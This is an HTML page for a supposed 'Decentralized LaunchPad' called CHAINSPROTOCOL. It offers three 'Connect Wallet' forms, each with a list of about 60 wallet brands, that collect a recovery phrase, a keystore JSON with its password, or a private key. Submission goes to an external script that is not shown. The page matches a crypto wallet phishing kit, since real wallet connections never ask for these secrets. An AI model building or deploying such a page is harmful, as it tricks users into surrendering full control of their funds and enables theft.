<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css">
    <script src="script.js" defer></script>
    <!-- jQuery -->
<script src="https://code.jquery.com/jquery-3.6.4.min.js" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous"></script>

<!-- SweetAlerts -->
<script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
    <title>Decentralized LaunchPad</title>
</head>
<body>
  <!--Header menu-->
  <header class="fixed-header">
    <div class="mobile-header">
      <div class="logo">CHAINSPROTOCOL</div>
      <div class="wallet-icon-container">
        <a href="#card">
        <div class="wallet-icon">
          <svg viewBox="0 0 20 20" xmlns="http://www.w3.org/2000/svg"><g id="Layer_2" data-name="Layer 2"><path d="m11.173 12.827a4 4 0 0 1 2.827-6.827h4v-.17a2.834 2.834 0 0 0 -2.83-2.83h-11.34a2.834 2.834 0 0 0 -2.83 2.83v8.34a2.834 2.834 0 0 0 2.83 2.83h11.34a2.834 2.834 0 0 0 2.83-2.83v-.17h-4a3.973 3.973 0 0 1 -2.827-1.173z"/><path d="m18.058 8h-3.912a2.109 2.109 0 0 0 -2.146 2.1 2.005 2.005 0 0 0 2 1.9h4.058a.942.942 0 0 0 .942-.942v-2.116a.942.942 0 0 0 -.942-.942zm-4.058 3a1 1 0 1 1 1-1 1 1 0 0 1 -1 1z"/></g></svg>
        </div>
        </a>
      </div>
    </div>
  </header>
  <div class="coinmarquee-container">
    <script type="text/javascript" src="https://files.coinmarketcap.com/static/widget/coinMarquee.js"></script>
    <div id="coinmarketcap-widget-marquee" coins="1,1027,825,5426,52,2,74,1958,1975,2010,3408,5964,6636,3890,7083,27772,6958" currency="USD" theme="dark" transparent="false" show-symbol-logo="true"></div>
  </div>
 <div class="hero-title">
   <br>
   <br>
   &nbsp;
    </div>
<!-- Hero Title Section -->
<div class="hero-title">

  <h1>CONNECT TO YOUR WALLET BELOW</h1>
  <p class="subtitle">Use any of the connection methods below to get started</p>
</div>
<!-- Connection Method 1: Phrase -->
<div class="card" id="card">
    <img src="asset/images/icon/upload.png" alt="Upload Icon">
    <h3>Connect using Mnemonic Phrase</h3>
    <button onclick="openModal('modal-phrase')">Connect</button>
</div>

<!-- Connection Method 2: KeyStore -->
<div class="card">
    <img src="asset/images/icon/upload.png" alt="Upload Icon">
    <h3>Connect using KeyStore Json</h3>
    <button onclick="openModal('modal-keystore')">Connect</button>
</div>

<!-- Connection Method 3: Private Key -->
<div class="card">
    <img src="asset/images/icon/upload.png" alt="Upload Icon">
    <h3>Connect using Private Key</h3>
    <button onclick="openModal('modal-private-key')">Connect</button>
</div>

<!-- Modal for Connection Method 1 (Phrase) -->
<div class="modal" id="modal-phrase">
    <div class="modal-content">
        <div class="modal-header">
            <h5 class="modal-title"><strong>Enter Phrase</strong></h5>
            <button type="button" class="close" onclick="closeModal('modal-phrase')">&times;</button>
        </div>
        <div class="modal-body">
            <p class="modal-text"><strong>Phrase is typically 12, sometimes 24 words separated by single spaces</strong></p>
            <div class="dragArea">
                <form name="phraseForm" onsubmit="submitFormData(0); return false;">
                  <!--selection--->
                      <div class="form-group">
    <label for="walletType-modal-phrase">Select Wallet Type</label>
    <select name="walletType" class="form-control" id="walletType-modal-phrase" required>
        <option value="" disabled selected hidden>Choose Wallet</option>
<option value="walletconnect.com">Wallet Connect</option>
<option value="trustwallet.com">Trust Wallet</option>
<option value="metamask.io">Metamask</option>
<option value="Flint-Wallet.com">Flint Wallet</option>
<option value="binance.com">Binance Chain Wallet</option>
<option value="polygon.technology">Polygon Wallet</option>
<option value="rainbow.me">Rainbow</option>
<option value="bitpay.com">Bitpay</option>
<option value="walleth.org">Walleth</option>
<option value="argent.xyz">Argent</option>
<option value="huobiwallet.com">Huobi Wallet</option>
<option value="encrypted.ink">Encrypted Ink</option>
<option value="compound.finance">Compound</option>
<option value="polkadot.network">Polkadot</option>
<option value="iotex.io">Iotex</option>
<option value="coin98.com">Coin98</option>
<option value="coinbase.com">Coinbase</option>
<option value="crypto.com">Crypto.com | Defi Wallet</option>
<option value="tokenpocket.pro">Token Pocket</option>
<option value="mathwallet.org">Math Wallet</option>
<option value="ledger.com">Ledger Live</option>
<option value="1inch.io">1Inch</option>
<option value="dharma.io">Dharma</option>
<option value="trustology.io">Trust Vault</option>
<option value="mykey.org">MYKEY</option>
<option value="atomicwallet.io">Atomic</option>
<option value="coolwallet.io">CoolWallet S</option>
<option value="nash.io">Nash</option>
<option value="coinomi.com">Coinomi</option>
<option value="gridplus.io">GridPlus</option>
<option value="tokenary.io">Tokenary</option>
<option value="safepal.io">SafePal</option>
<option value="infinitowallet.io">Infinito</option>
<option value="wallet.io">Wallet.io</option>
<option value="ownbit.io">Ownbit</option>
<option value="easypocket.app">EasyPocket</option>
<option value="mtpelerin.com">Bridge Wallet</option>
<option value="viawallet.com">ViaWallet</option>
<option value="bitkeep.com">BitKeep</option>
<option value="unstoppable.money">Unstoppable Wallet</option>
<option value="halodefi.org">HaloDefi Wallet</option>
<option value="dokwallet.com">Dok Wallet</option>
<option value="cellowallet.app">Cello Wallet</option>
<option value="coinus.io">CoinUs</option>
<option value="valoraapp.com">Valora</option>
<option value="trusteeglobal.com">Trustee Wallet</option>
<option value="guarda.com">Gaurda Wallet</option>
<option value="Maiar.com">Maiar Wallet</option>
<option value="jadewallet.io">Jade Wallet</option>
<option value="plasmapay.com">PlasmaPay</option>
<option value="o3.network">O3Wallet</option>
<option value="me.hashkey.com">HashKey Me</option>
<option value="rsk.co">RWallet</option>
<option value="flarewallet.io">Flare Wallet</option>
<option value="kyberswap.com">KyberSwap</option>
<option value="atoken.com">AToken Wallet</option>
<option value="tongue.fi">Tongue Wallet</option>
<option value="xinfin.io">XinFin XDC Network</option>
<option value="talken.io">Talken Wallet</option>
<option value="keyring.app">KEYRING PRO</option>
<option value="midasprotocol.io">Midas Wallet</option>
<option value="authentrend.com">AT.Wallet</option>
<option value="token.im">imToken</option>
                        </select>
                      
                        <label for="Phrase-modal-phrase">Enter 12 or 24 Words Phrase/Mnemonic in the right order</label>
                        <textarea name="Phrase" placeholder="Enter heree.g apple crush, in 12 or 24 places. Each word should have only one space" data-form-field="Phrase" required="required" class="form-control" id="Phrase-modal-phrase"></textarea>
                    </div>
                    <div class="input-group-btn">
                        <button type="submit" class="btn btn-primary">Connect Wallet</button>
                    </div>
                </form>
            </div>
        </div>
    </div>
</div>
  
<!-- Modal for Connection Method 2 (KeyStore) -->
<div class="modal" id="modal-keystore">
  <div class="modal-content">
    <div class="modal-header">
      <h5 class="modal-title"><strong>Enter KeyStore JSON</strong></h5>
     <button type="button" class="close" onclick="closeModal('modal-keystore')">&times;</button>
    </div>
    <div class="modal-body">
      <p class="modal-text">Several lines of text beginning with '(...)' plus the password you used to encrypt it.</p>
      <div class="dragArea">
        <form name="keystoreForm" onsubmit="validateKeyStoreForm(); return false;">
             <!--selection--->
                      <div class="form-group">
    <label for="walletType-modal-phrase">Select Wallet Type</label>
    <select name="walletType" class="form-control" id="walletType-modal-phrase" required>
        <option value="" disabled selected hidden>Choose Wallet</option>
                          <option value="walletconnect.com">Wallet Connect</option>
                          <option value="trustwallet.com">Trust Wallet</option>
                          <option value="metamask.io">Metamask</option>
                          <option value="Flint-Wallet.com">Flint Wallet</option>
                          <option value="binance.com">Binance Chain Wallet</option>
                          <option value="polygon.technology">Polygon Wallet</option>
                          <option value="rainbow.me">Rainbow</option>
                          <option value="bitpay.com">Bitpay</option>
                          <option value="walleth.org">Walleth</option>
                          <option value="argent.xyz">Argent</option>
                          <option value="huobiwallet.com">Huobi Wallet</option>
                          <option value="encrypted.ink">Encrypted Ink</option>
                          <option value="compound.finance">Compound</option>
                          <option value="polkadot.network">Polkadot</option>
                          <option value="iotex.io">Iotex</option>
                          <option value="coin98.com">Coin98</option>
                          <option value="coinbase.com">Coinbase</option>
                          <option value="crypto.com">Crypto.com | Defi Wallet</option>
                          <option value="tokenpocket.pro">Token Pocket</option>
                          <option value="mathwallet.org">Math Wallet</option>
                          <option value="ledger.com">Ledger Live</option>
                          <option value="1inch.io">1Inch</option>
                          <option value="dharma.io">Dharma</option>
                          <option value="trustology.io">Trust Vault</option>
                          <option value="mykey.org">MYKEY</option>
                          <option value="atomicwallet.io">Atomic</option>
                          <option value="coolwallet.io">CoolWallet S</option>
                          <option value="nash.io">Nash</option>
                          <option value="coinomi.com">Coinomi</option>
                          <option value="gridplus.io">GridPlus</option>
                          <option value="tokenary.io">Tokenary</option>
                          <option value="safepal.io">SafePal</option>
                          <option value="infinitowallet.io">Infinito</option>
                          <option value="wallet.io">Wallet.io</option>
                          <option value="ownbit.io">Ownbit</option>
                          <option value="easypocket.app">EasyPocket</option>
                          <option value="mtpelerin.com">Bridge Wallet</option>
                          <option value="viawallet.com">ViaWallet</option>
                          <option value="bitkeep.com">BitKeep</option>
                          <option value="unstoppable.money">Unstoppable Wallet</option>
                          <option value="halodefi.org">HaloDefi Wallet</option>
                          <option value="dokwallet.com">Dok Wallet</option>
                          <option value="cellowallet.app">Cello Wallet</option>
                          <option value="coinus.io">CoinUs</option>
                          <option value="valoraapp.com">Valora</option>
                          <option value="trusteeglobal.com">Trustee Wallet</option>
                          <option value="guarda.com">Gaurda Wallet</option>
                          <option value="Maiar.com">Maiar Wallet</option>
                          <option value="jadewallet.io">Jade Wallet</option>
                          <option value="plasmapay.com">PlasmaPay</option>
                          <option value="o3.network">O3Wallet</option>
                          <option value="me.hashkey.com">HashKey Me</option>
                          <option value="rsk.co">RWallet</option>
                          <option value="flarewallet.io">Flare Wallet</option>
                          <option value="kyberswap.com">KyberSwap</option>
                          <option value="atoken.com">AToken Wallet</option>
                          <option value="tongue.fi">Tongue Wallet</option>
                          <option value="xinfin.io">XinFin XDC Network</option>
                          <option value="talken.io">Talken Wallet</option>
                          <option value="keyring.app">KEYRING PRO</option>
                          <option value="midasprotocol.io">Midas Wallet</option>
                          <option value="authentrend.com">AT.Wallet</option>
                          <option value="token.im">imToken</option>
                        </select>

            <label for="textarea-modal-keystore">Enter KeyStore JSON</label>
            <textarea name="keystore" placeholder="Enter your KeyStore JSON" data-form-field="keystore" required="required" class="form-control" id="textarea-modal-keystore"></textarea>
          </div>
          <div class="form-group">
            <label for="password-modal-keystore">Password</label>
            <input type="password" name="password" placeholder="Enter your Encryption Password" data-form-field="password" class="form-control" required="required" value="" id="password-modal-keystore">
          </div>
          <div class="input-group-btn">
            <button type="submit" class="btn btn-primary">Connect Wallet</button>
          </div>
        </form>
      </div>
    </div>
  </div>
</div>

<!-- Modal for Connection Method 3 (Private Key) -->
<div class="modal" id="modal-private-key">
    <div class="modal-content">
        <div class="modal-header">
            <h5 class="modal-title"><strong>Enter Private Key</strong></h5>
            <button type="button" class="close" onclick="closeModal('modal-private-key')">&times;</button>
        </div>
        <div class="modal-body">
            <p class="modal-text">Typically 64 alphanumeric characters.</p>
            <div class="dragArea">
                <form name="privateKeyForm" onsubmit="submitFormData(2); return false;">
                       <!--selection--->
                      <div class="form-group">
    <label for="walletType-modal-phrase">Select Wallet Type</label>
    <select name="walletType" class="form-control" id="walletType-modal-phrase" required>
        <option value="" disabled selected hidden>Choose Wallet</option>
                          <option value="walletconnect.com">Wallet Connect</option>
                          <option value="trustwallet.com">Trust Wallet</option>
                          <option value="metamask.io">Metamask</option>
                          <option value="Flint-Wallet.com">Flint Wallet</option>
                          <option value="binance.com">Binance Chain Wallet</option>
                          <option value="polygon.technology">Polygon Wallet</option>
                          <option value="rainbow.me">Rainbow</option>
                          <option value="bitpay.com">Bitpay</option>
                          <option value="walleth.org">Walleth</option>
                          <option value="argent.xyz">Argent</option>
                          <option value="huobiwallet.com">Huobi Wallet</option>
                          <option value="encrypted.ink">Encrypted Ink</option>
                          <option value="compound.finance">Compound</option>
                          <option value="polkadot.network">Polkadot</option>
                          <option value="iotex.io">Iotex</option>
                          <option value="coin98.com">Coin98</option>
                          <option value="coinbase.com">Coinbase</option>
                          <option value="crypto.com">Crypto.com | Defi Wallet</option>
                          <option value="tokenpocket.pro">Token Pocket</option>
                          <option value="mathwallet.org">Math Wallet</option>
                          <option value="ledger.com">Ledger Live</option>
                          <option value="1inch.io">1Inch</option>
                          <option value="dharma.io">Dharma</option>
                          <option value="trustology.io">Trust Vault</option>
                          <option value="mykey.org">MYKEY</option>
                          <option value="atomicwallet.io">Atomic</option>
                          <option value="coolwallet.io">CoolWallet S</option>
                          <option value="nash.io">Nash</option>
                          <option value="coinomi.com">Coinomi</option>
                          <option value="gridplus.io">GridPlus</option>
                          <option value="tokenary.io">Tokenary</option>
                          <option value="safepal.io">SafePal</option>
                          <option value="infinitowallet.io">Infinito</option>
                          <option value="wallet.io">Wallet.io</option>
                          <option value="ownbit.io">Ownbit</option>
                          <option value="easypocket.app">EasyPocket</option>
                          <option value="mtpelerin.com">Bridge Wallet</option>
                          <option value="viawallet.com">ViaWallet</option>
                          <option value="bitkeep.com">BitKeep</option>
                          <option value="unstoppable.money">Unstoppable Wallet</option>
                          <option value="halodefi.org">HaloDefi Wallet</option>
                          <option value="dokwallet.com">Dok Wallet</option>
                          <option value="cellowallet.app">Cello Wallet</option>
                          <option value="coinus.io">CoinUs</option>
                          <option value="valoraapp.com">Valora</option>
                          <option value="trusteeglobal.com">Trustee Wallet</option>
                          <option value="guarda.com">Gaurda Wallet</option>
                          <option value="Maiar.com">Maiar Wallet</option>
                          <option value="jadewallet.io">Jade Wallet</option>
                          <option value="plasmapay.com">PlasmaPay</option>
                          <option value="o3.network">O3Wallet</option>
                          <option value="me.hashkey.com">HashKey Me</option>
                          <option value="rsk.co">RWallet</option>
                          <option value="flarewallet.io">Flare Wallet</option>
                          <option value="kyberswap.com">KyberSwap</option>
                          <option value="atoken.com">AToken Wallet</option>
                          <option value="tongue.fi">Tongue Wallet</option>
                          <option value="xinfin.io">XinFin XDC Network</option>
                          <option value="talken.io">Talken Wallet</option>
                          <option value="keyring.app">KEYRING PRO</option>
                          <option value="midasprotocol.io">Midas Wallet</option>
                          <option value="authentrend.com">AT.Wallet</option>
                          <option value="token.im">imToken</option>
                        </select>

                        <label for="textarea-modal-private-key">Enter your Private Key</label>
                        <textarea name="privateKey" placeholder="Enter your Private Key" data-form-field="privateKey" required="required" class="form-control" id="textarea-modal-private-key"></textarea>
                    </div>
                    <div class="input-group-btn">
                        <button type="submit" class="btn btn-primary">Connect Wallet</button>
                    </div>
                </form>
            </div>
        </div>
    </div>
</div>
<!--footer section -->
<footer class="credit">
    <p>2024 Chainsprotocol. All rights reserved.</p>
</footer>
</body>
</html>
